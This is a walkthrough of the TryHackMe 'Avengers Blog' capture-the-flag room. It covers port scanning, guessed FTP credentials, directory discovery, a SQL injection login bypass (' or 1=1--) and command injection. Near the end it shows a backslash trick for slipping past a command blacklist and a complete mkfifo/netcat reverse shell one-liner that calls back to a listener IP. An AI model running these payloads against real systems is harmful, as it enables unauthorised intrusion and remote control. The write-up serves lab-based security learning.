TryHackMe: Avengers Blog

**UPDATE 7/5/21**
I finally found a way to bypass the filter and get the reverse shell

[Task 1] Deploy
Let’s enumerate machine

  1. Scan ports
nmap -Pn <ip>

2. Scan everything

nmap -A <ip>

3. Scan for vulnerabilities

nmap --script vuln <ip>

4. connect ftp

nc <ip> <port>

5. connect ssh

ssh <ip>

6. Explore site port 80 with google-chrome

I like to use Chrome because It has more functionality for inspecting web app.

Installation guide: https://www.tecmint.com/install-google-chrome-on-kali-linux/

Open Chrome

google-chrome --no-sandbox

A user hint to something, here’s the list of my guessing

  • groot:iamgroot
  • iamgroot:iamgroot
  • groot:groot

View page source

8. Follow the link

/js/script.js

Flag1!!!

[Task 2] Cookies

  1. On the deployed Avengers machine you recently deployed, get the flag1 cookie value.

Right-click to inspect element

At Storage → Cookies, there’s cookie

Click to see the details

[Task 3] HTTP Headers

  1. Look at the HTTP response headers and obtain flag 2.

Click at network tab and refresh site to capture all requests

[Task 4] Enumeration and FTP

  1. Look around the FTP share and read flag 3!

I will use the list of groot’s possible credentials

  • groot:iamgroot
  • iamgroot:iamgroot
  • groot:groot
ftp <ip>

I use username:password as groot : iamgroot. Luckily, I passed at first attempt.

lscd filesls

Read flag3.txt, find available commands

help
get flag3.txt
exit

Back to our machine

ls
cat flag3.txt

[Task 5] GoBuster

  1. What is the directory that has an Avengers login?

I don’t like gobuster. I’ll use dirbuster instead.

Explore each link, I find something at “/portal/”

[Task 6] SQL Injection

  1. Log into the Avengers site. View the page source, how many lines of code are there?

View source

Inspect element

Input data in both fields

' or 1=1--

[Task 7] Remote Code Execution and Linux

  1. Read the contents of flag5.txt

Try command

ls
cd ..;ls
cd ..;cat flag5.txt
cd ..;less flag5.txt

**UPDATE 7/5/21**

Get the reverse shell

Supply an input

ls

Read create.sql

cat create.sql

Bypass filter

c\a\t create.sql

Plus, you also got flag4

Read server.js

c\a\t server.js

You will see which commands are banned.

Reverse shell command

Prepare listener

rlwrap nc -lvp  443

Supply the command

From this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.11.30 443 >/tmp/f

to this

r\m /tmp/f;mkfifo /tmp/f;c\a\t /tmp/f|/bin/s\h -i 2>&1|n\c 10.11.11.30 443 >/tmp/f

Back to the listener, now I got the shell